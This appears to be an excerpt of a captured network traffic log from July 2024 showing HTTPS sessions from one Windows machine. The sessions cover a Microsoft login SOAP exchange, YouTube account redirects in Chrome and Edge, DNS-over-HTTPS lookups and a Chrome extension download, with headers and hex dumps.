2024-07-26 18:09:56 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49735	40.126.32.136	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:10 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4697 Host: login.live.com
2024-07-26 18:10:10 UTC	4697	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-26 18:10:10 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 26 Jul 2024 18:09:10 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C518_SN1 x-ms-request-id: 57089732-dd04-4336-b07d-3859567f8820 PPServer: PPV: 30 H: SN1PEPF0002F106 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 26 Jul 2024 18:10:10 GMT Connection: close Content-Length: 10921
2024-07-26 18:10:10 UTC	10921	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49741	172.217.18.14	443	3920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:12 UTC	810	OUT	GET /account HTTP/1.1 Host: www.youtube.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 18:10:12 UTC	2470	IN	HTTP/1.1 303 See Other Content-Type: application/binary X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 18:10:12 GMT Location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9 Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]} Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main" Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info." Server: ESF Content-Length: 0 X-XSS-Protection: 0 Set-Cookie: GPS=1; Domain=.youtube.com; Expires=Fri, 26-Jul-2024 18:40:12 GMT; Path=/; Secure; HttpOnly Set-Cookie: YSC=JgfdBk6rQAI; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Set-Cookie: VISITOR_INFO1_LIVE=gwYW_Oa_dIs; Domain=.youtube.com; Expires=Wed, 22-Jan-2025 18:10:12 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgTg%3D%3D; Domain=.youtube.com; Expires=Wed, 22-Jan-2025 18:10:12 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49753	172.217.18.14	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:15 UTC	666	OUT	GET /account HTTP/1.1 Host: www.youtube.com Connection: keep-alive sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:15 UTC	2479	IN	HTTP/1.1 303 See Other Content-Type: application/binary X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 18:10:15 GMT Location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main" Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en-GB for more info." Server: ESF Content-Length: 0 X-XSS-Protection: 0 Set-Cookie: GPS=1; Domain=.youtube.com; Expires=Fri, 26-Jul-2024 18:40:15 GMT; Path=/; Secure; HttpOnly Set-Cookie: YSC=q3TXwqkQJMg; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Set-Cookie: VISITOR_INFO1_LIVE=tOE5WoE-QYw; Domain=.youtube.com; Expires=Wed, 22-Jan-2025 18:10:15 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJw%3D%3D; Domain=.youtube.com; Expires=Wed, 22-Jan-2025 18:10:15 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49759	94.245.104.56	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:15 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:16 UTC	584	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Fri, 26 Jul 2024 18:10:15 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=88d31f0cb5ab53721a09ebe46f602392e25207883f7cc2fae163d3fe82485a2f;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=88d31f0cb5ab53721a09ebe46f602392e25207883f7cc2fae163d3fe82485a2f;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49781	162.159.61.3	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:19 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-07-26 18:10:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-07-26 18:10:19 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 26 Jul 2024 18:10:19 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8a965888ace94378-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 18:10:19 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d2 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49778	162.159.61.3	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:19 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-07-26 18:10:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-07-26 18:10:19 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 26 Jul 2024 18:10:19 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8a965888cfa619cb-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 18:10:19 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 13 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49777	162.159.61.3	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:19 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-07-26 18:10:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-07-26 18:10:19 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 26 Jul 2024 18:10:19 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8a965888cd2e0f68-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 18:10:19 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fb 28 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49782	142.250.185.161	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:20 UTC	594	OUT	GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:20 UTC	565	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 135751 X-GUploader-UploadID: AHxI1nPQ3P14lPV61_fO05arXT0TfK1TyDkISPNzSbjXi6Lq_b7fUlhwCon7BnPe2y_3Av6dQDc X-Goog-Hash: crc32c=IDdmTg== Server: UploadServer Date: Fri, 26 Jul 2024 15:56:45 GMT Expires: Sat, 26 Jul 2025 15:56:45 GMT Cache-Control: public, max-age=31536000 Age: 8015 Last-Modified: Tue, 23 Jul 2024 15:56:28 GMT ETag: 1d368626_ddaec042_86665b6c_28d780a0_b2065016 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 18:10:20 UTC	825	IN	Data Raw: 43 72 32 34 03 00 00 00 e8 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-07-26 18:10:20 UTC	1390	IN	Data Raw: 30 5e ae fd 8f bf fc 18 3f ab aa ce 6f f5 9f 86 ea f3 4f e7 8b aa 7e fc f9 c7 ed f2 de 57 f2 ef e5 b5 1f ab 7e fc f1 97 7f fc 18 f2 a7 ba e6 52 7f be 7a 86 4d 61 da 86 e0 b6 91 9a 75 5d 9a b5 2a 9f 87 2d b7 6e 97 ac 9b be 32 73 3c 97 a6 da 8a e4 b0 45 fb 9f 36 ba 3c 2e c2 57 bd 48 91 71 68 ae 17 fd f9 3a 6a a8 79 f8 fe f7 4e dd 44 1a 5d 4e 6a fc f5 d0 bb b5 f4 df 2f a7 cb 61 8a 9a f7 7b e9 db fd f7 67 ca ce f9 92 d0 b9 66 29 ba 7e 7f 5f 98 88 8b a7 31 71 fe fe 4c da 11 23 06 47 da 8d 8d f0 51 97 77 14 c8 99 1d 4a 10 22 04 c4 8e 74 e1 33 0f c2 4d e5 0b 5b 3c 43 e7 18 dc 2e a5 0f 8d 7c 77 d8 1e 94 73 2b 4c 54 17 3e 9b 8f 26 ec 8e 26 50 a5 85 6a 61 ea eb 6e 98 0b 73 73 39 ee c2 67 61 3a ff 1e e7 f7 b3 85 53 ee a9 9e 59 f5 3e 81 0c 1d b9 f8 4a 3a 06 39 87 17 Data Ascii: 0^?oO~W~RzMau]*-n2s<E6<.WHqh:jyND]Nj/a{gf)~_1qL#GQwJ"t3M[<C.\|ws+LT>&&Pjanss9ga:SY>J:9
2024-07-26 18:10:20 UTC	1390	IN	Data Raw: 44 b0 b4 75 cd a2 45 f6 da fb af bc 3f ce 66 36 89 54 f7 7b 85 4d 64 18 16 65 30 97 1e f2 8b 3d 8c f3 00 e1 48 79 96 ec ea 1d f6 a0 d6 80 10 97 4f 10 60 43 7e 2d de bf 3f ac f5 dc 1b 32 87 63 d4 2b 25 8c c9 3d 52 f4 88 e8 d8 51 25 77 c5 5e 7a c9 5e 86 25 15 31 06 d8 2d 7b ad d1 54 eb 11 a3 53 14 2c cf 7d f9 ff d0 e0 b2 c1 43 66 d4 4a 06 e2 33 37 55 9a 78 d1 48 02 d7 8b 1b d1 0b 33 cc 70 a7 4b c1 72 2f c2 13 19 ed c4 5b a9 a0 8b 4d b9 59 5e 7b 72 2d ff 51 fb dc 0d f6 85 87 e6 ba 95 5e 68 12 00 3b 14 08 91 1b c3 91 cc 5a 03 7c cc a3 e0 a7 19 9b 8f 07 0b 70 9c 51 bc af ba f7 c7 22 7f 6b ed da 1b 3c a4 60 9b 5a c3 ab 54 de 7c 82 75 4b 00 a2 d8 aa 43 9d 31 12 d1 82 59 67 1d aa fb 81 1f 1b e0 15 11 e5 97 16 34 8b 65 ef 77 cd 57 b2 c7 ad ba 65 8d f2 aa de 35 a2 Data Ascii: DuE?f6T{Mde0=HyO`C~-?2c+%=RQ%w^z^%1-{TS,}CfJ37UxH3pKr/[MY^{r-Q^h;Z\|pQ"k<`ZT\|uKC1Yg4ewWe5
